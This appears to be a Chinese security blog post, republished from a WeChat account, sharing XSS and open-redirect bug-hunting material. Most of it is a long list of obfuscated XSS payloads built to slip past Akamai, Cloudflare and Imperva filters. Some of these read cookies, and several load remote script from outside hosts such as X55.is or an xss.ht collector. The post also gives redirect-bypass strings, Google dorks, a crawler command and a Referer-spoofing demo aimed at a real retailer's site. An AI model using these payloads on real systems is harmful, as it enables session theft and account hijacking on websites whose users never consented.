XSS挖掘工具资源分享


XSS

  1. 测试不同编码方式并检查是否存在任何奇怪的行为
    1. <"'`--!>
    2. 如果 `<` 被反射为 `&lt;` 或 `%3c` --> 测试双重编码（例如发送 `%253c`，看后端是否再解一次码）
    3. https://github.com/InfoSecOne/ghettoBypass
    4. https://github.com/masatokinugawa/filterbypass/wiki/Browser%27s-XSS-Filter-Bypass-Cheat-Sheet
  2. 逆向工程开发者的思维
  3. XSS挖掘工具资源分享

CSP

  • CSP审查工具
1. %3C/script%20%3E 
2. mitsecXSS%22%3E%3Cinput%20%00%20onControl%20hello%20oninput=confirm(1)%20x%3E
3. "><img src onerror=document.body.appendChild(Object.assign(document.createElement('script'),{src:'https:'.concat(String.fromCharCode(47)).concat(String.fromCharCode(47)).concat('externaljshere')}));>
4.

Waf

Akamai JSi 
';k='e'%0Atop['al'+k+'rt'](1)//
'"><A HRef=" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](document%2Bcookie)>

CloudFlare HTMLi
<Img Src=OnXSS OnError=alert(1)>
<Img Src=OnXSS OnError=confirm(document.cookie)>

Imperva HTMLi
<Img Src=//X55.is OnLoad%0C=import(Src)>

XSS挖掘工具资源分享

工具和资源

  • cheat-sheet
  • Dom-xss-burp

Referer xss

  • window.history.replaceState() 在不触发导航的情况下改写当前历史条目的 URL；配合链接上的 referrerpolicy="unsafe-url"，随后点击链接时浏览器会把改写后的 URL 作为 Referer 发出——用于测试把 Referer 当作信任依据的服务端逻辑
  • https://webhook.site/
  • CRLF
<body>
<!-- Demo for the "Referer XSS" note above: the anchor carries referrerpolicy="unsafe-url",
     so the browser sends the full current-document URL as Referer even on a cross-origin
     navigation. -->
<a
href="https://www.marksandspencer.com.tr/cerez-politikasi?1111"
referrerpolicy="unsafe-url"
>

click me
</a>
<script>
// Rewrite the current history entry's URL to "1.html" (same origin, no navigation).
// A later click on the anchor is expected to carry this rewritten URL in the Referer
// header, which is the "replace history to replace the referer" trick. NOTE(review):
// verify against the target's response (or a webhook) that the Referer is actually
// reflected/trusted — this page only sets up the request.
window.history.replaceState(null,"","1.html")
</script>
</body>

Url跳转

重定向过程中会

深度利用

  1. window.location（前端跳转）: 寻找 XSS（例如 `javascript:` 协议的目标 URL）
  2. 后端判定:寻找ssrf

bypass

/xxx.com
//xxx.com
\xxx.com
//xxx.com
//domain.com@xxx.com   （userinfo 技巧：`@` 之前伪装成白名单域名，浏览器实际访问 xxx.com；原文此处被页面的邮箱保护脚本替换成了 [email protected]，两个域名的先后顺序请以原文为准）
//xxx.com
https://xxx.com%2Fdomain.com
https://xxx.com%2523.domain.com
https://xxx.com?c=.domain.com (#  也可以)
//%2F/xxx.com
////xxx.com
https://domain.computer/
https://domain.com.xxx.com
/%0D/xxx.com(%09 , %00, %0a, %07, %2F)
/%5Cxxx.com
//google%E3%80%82com


& ? # /  

google dork

inurl:url= | inurl:return= | inurl:return_url= | inurl:rUrl=| inurl:r_url= | inurl:next= | inurl:cancelUrl= | inurl:goto= | inurl:follow= | inurl:returnTo= | inurl:history= | inurl:redirect= | inurl:redirectTo= | inurl:redirectUrl= | inurl:goback= | inurl:redir= | inurl:redirUrl= | inurl:ret= | inurl:r2= | inurl:page= inurl:& inurl:http site:example.com

gospider

gospider -w -r -a -s https://wwww.xxx.com  | grep -E "callback|%2F|redirect|url=|return|rurl|r_url|next|cancelUrl|goto|follow|returnto|history|goback|redir=|ret=|r2=|page=|jump=|target="

Waf xss payload

"><img/src/onerror=import('//domain/')>"@yourdomain
013371337;ext=<img/src/onerror=import('//domain/')>

<Svg Only=1 OnLoad=confirm(document.domain)>
<Svg/OnLoad=alert(1337)>"@gmail.com
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>
<svg onload=alert&#0000000040document.cookie)>
<svg onload=alert&#0000000040"
1")><””>
<Img Src=//X55.is OnLoad%0C=import(Src)>
%3csvg/onload=window%5b"al"+"ert"%5d`1337`%3e
%3Csvg%20onload=alert(%22MrHex88%22)%3E
%3Cimg%20src=x%20onerror=alert(%22MrHex88%22)%3E
"><svg onmouseover="confirm&#0000000040document.domain)
<Img Src=OnXSS OnError=confirm(1337)>
'%3e%3cscript%3ealert(5*5)%3c%2fscript%3eejj4sbx5w4o
javascript:var a="ale";var b="rt";var c="()";decodeURI("<button popovertarget=x>Click me</button><hvita onbeforetoggle="+a+b+c+" popover id=x>Hvita</hvita>")
<a/href="javascript:Reflect.get(frames,'ale'+'rt')(Reflect.get(document,'coo'+'kie'))">ClickMe
<Script>window.valueOf=alert;window%2B1</Script>
<svg/onload=location=location.hash.substr(1)>#javascript:alert(1)


"><form onformdata%3Dwindow.confirm(cookie)><button>XSS here<!--
1%22onfocus=%27alert%28document.cookie%29%27%20autofocus=
1%22onfocus=%27window.alert%28document.cookie%29%27%20autofocus=
"><𝘀𝘃𝗴+𝗼𝗻𝗹𝗼𝗮𝗱=𝗰𝗼𝗻𝗳𝗶𝗿𝗺(𝗰𝗼𝗼𝗸𝗶𝗲)> 
- 1'"();<test><ScRiPt >window.alert("XSS_WAF_BYPASS")
'"><img src=x onerror=alert("xss!")>.pdf


"><input%252bTyPE%25253d"hxlxmj"%252bSTyLe%25253d"display%25253anone%25253b"%252bonfocus%25253d"this.style.display%25253d'block'%25253b%252bthis.onfocus%25253dnull%25253b"%252boNMoUseOVer%25253d"this['onmo'%25252b'useover']%25253dnull%25253beval(String.fromCharCode(99,111,110,102,105,114,109,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))%25253b"%252bAuToFOcus>
%3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E
<sVG/oNLY%3d1/**/On+ONloaD%3dco\u006efirm%26%23x28%3b%26%23x29%3b>
&#34;&gt;&lt;track/onerror=&#x27;confirm%601%60&#x27;&gt;
"><track/onerror='confirm`1`'>
%3Cdiv%20id%3D%22load%22%3E%3C%2Fdiv%3E%3Cscript%3Evar%20i%20%3D%20document.createElement%28%27iframe%27%29%3B%20i.style.display%20%3D%20%27none%27%3B%20i.onload%20%3D%20function%28%29%20%7B%20i.contentWindow.location.href%20%3D%20%27%2F%2Fxss.today%27%3B%20%7D%3B%20document.getElementById%28%27load%27%29.appendChild%28i%29%3B%3C%2Fscript%3E
<vIdeO><sourCe onerror="['al\u0065'+'rt'][0]['\x63onstructor']['\x63onstructor']('return this')()[['al\u0065'+'rt'][0]]([String.fromCharCode(8238)+[!+[]+!+[]]+[![]+[]][+[]]])">
<video><source onerror="alert.constructor.constructor('return this')().alert('0f')">
<a href="#" id="uniqueLink">Click me</a> <script> (function() { var a = ['\x6F\x70\x65\x6E', '\x77\x72\x69\x74\x65', '\x63\x6C\x6F\x73\x65', '\x70\x72\x69\x6E\x74', '\x61\x6C\x65\x72\x74']; var b = ['@', 'h', 'x', 'l', 'x', 'm', 'j']; var c = ['B', '1', 'P', '4', '$', '$']; document.getElementById('uniqueLink').onclick = function() { var w = window[a[0]](); w.document[a[1]](b.join('')); w.document[a[2]](); w[a[3]](); window[a[4]](c.join('')); }; })(); </script>
<sCrIpT>(function(){var a=[97,108,101,114,116];var
b=String.fromCharCode.apply(null,a);var c=[88,115,112,108,111,105,116];var d=String.fromCharCode.apply(null,c);window[b](d);})()</sCrIpT>
<DiV sTylE="WidTH:100&#37;;HeIgHt:100vH&#59;" oNpOINteROvEr="var _0x1abc=['\x63','\x6F','\x6E','\x73','\x74','\x72','\x75','\x63','\x74','\x6F','\x72'];var _0x2bcd=['\x61','\x6C','\x65','\x72','\x74','\x28','\x64','\x6F','\x63','\x75','\x6D','\x65','\x6E','\x74','\x2E','\x64','\x6F','\x6D','\x61','\x69','\x6E','\x29'];[][_0x1abc.join('')][_0x1abc.join('')](_0x2bcd.join(''))((97^0)===97?1:0);"></dIV>
<div style="width:100%;height:100vh;" onpointerover="[][decodeURIComponent('%63%6F%6E%73%74%72%75%63%74%6F%72')][decodeURIComponent('%63%6F%6E%73%74%72%75%63%74%6F%72')](decodeURIComponent('%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%64%6F%6D%61%69%6E%29'))()"> </div>
<div onpointerover="ja&#x76;ascr&#x69;pt:eva&#x6C;(decodeURICompo&#110;ent(String.fromCharCode(97, 108, 101, 114, 116, 40, 100, 111, 99, 117, 109, 101, 110, 116, 46, 100, 111, 109, 97, 105, 110, 41)))" style="width:100%;height:100vh;"></div>
<div onpointerover="javascript:alert(document.domain)" style="width:100%;height:100vh;"></div>
<svg onload=(function(){let arr=[41,49,40,116,114,101,108,97].reverse().map(e=>String.fromCharCode(e));let func=new Function(...arr);func();})()>
<svg onload="alert(1)"></svg>
jaVasCript:/*-/*`/*\`/*'/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//%0D%0A%0d%0a//%0D%0A%0d%0a//%0D%0A%0d%0a//%0D%0A%0d%0a//%0D%0A%252f%252a*/(/*%252f%252a*/*&#x252f;&#x252a;prompt(1)&#x252f;&#x253b;/**/;eval(atob('YWxlcnQoIkhpISIp'))//%0D%0A%0d%0a//%0D%0A%0d%0a//%0D%0A%0d%0a//%0D%0A%0d%0a//%0D%0A%0d%0a//%0D%0A%252f%252a*/)//
<select><noembed></select><script x='a@b'a> y='a@b'//a@b%0a\u0061lert('CYBERTIX')</script x>


<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>

<BODY onload!#$%&()*~+-_.,:;?@[/|]^`=alert("XSS")>
"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)>
<math><x xlink:href=javascript:confirm`1`>click
<script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/
<svg onload=alert&#0000000040document.cookie)>
JavaScript://%250Aalert?.(1)//
'/*'/*"/*"/*`/*`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1)}//><Base/Href=//google.com\76-->
<details%0Aopen%0AonToGgle%0A=%0Aabc=(co\u006efirm);abc%28%60xss%60%26%230000000000000000041//
xss'"><iframe srcdoc='%26lt;script>;alert(1)%26lt;/script>'>
javascript:%ef%bb%bfalert(XSS)
<input accesskey=X onclick="self['wind'+'ow']['one'+'rror']=alert;throw 1337;">
<svg onload="[]['\146\151\154\164\145\162']['\143\157\156\163\164\162\165\143\164\157\162'] ('\141\154\145\162\164\50\61\51')()">
"><video><source onerror=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vYXlkaW5ueXVudXMueHNzLmh0Ijtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw&#61;&#61;>
&#34;&gt;&lt;track/onerror=&#x27;confirm%601%60&#x27;&gt;
<svg><use href="data:image/svg+xml;base64,PHN2ZyBpZD0neCcgeG1sbnM9J2h0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnJyB4bWxuczp4bGluaz0naHR0cDovL3d3dy53My5vcmcvMTk5OS94bGluaycgd2lkdGg9JzEwMCcgaGVpZ2h0PScxMDAnPgo8aW1hZ2UgaHJlZj0iMSIgb25lcnJvcj0iYWxlcnQoMSkiIC8+Cjwvc3ZnPg==hashtag#x" /></svg>
"`'><script>\xE2\x80\x87javascript:alert(1)</script>
<img/src=x onError="`${x}`;alert(`Hello`);">
"`'><script>\xE2\x80\x87javascript:alert(1)</script>
"%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F
"/><img%20s+src+c=x%20on+onerror+%20="alert(1)">
&#34;&gt;&lt;track/onerror=&#x27;confirm%601%60&#x27;&gt;


<svg/onload=location='javas'%2B'cript:'%2B'ale'%2B'rt'%2Blocation.hash.substr(1)>#(1)

<svg/onload=location=/javas/.source%2B/cript:/.source%2B/ale/.source%2B/rt/.source%2Blocation.hash.substr(1)>#(1)

"'`//><Svg+Only%3d1+OnLoad%3dconfirm(atob("WW91IGhhdmUgYmVlbiBoYWNrZWQgYnkgb3R0ZXJseSE"))>
"%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F
<SCRIPT>location=%27javasCript:alert\x28\x29%27</SCRIPT>
';k='e'%0Atop['al'+k+'rt'](1)//
"';k='e'%0Atop['al'+k+'rt'](1)//"
<Img Src=//X55.is OnLoad%0C=import(Src)>
<img/src/onerror=alert/1337/(1)>
<img/src/onerror=alert//&NewLine;(2)>
<img/src/onerror=alert&sol;&sol;(3)>
'"/><script%20>alert(document.domain)<%2fscript>.css
<iframe srcdoc="<img src=x onerror=alert(999)>"></iframe>
/path?next=javascript:top[/al/.source+/ert/.source](document.cookie)
login?redirectUrl=javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.domain
<details%0Aopen%0AonToGgle%0A=%0Aabc=(co\u006efirm);abc(VulneravelXSS%26%2300000000000000000041//

原文始发于微信公众号(白安全组):XSS挖掘工具资源分享

  • 本文由 发表于 2024年5月17日18:52:47
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   XSS挖掘工具资源分享https://cn-sec.com/archives/2749504.html
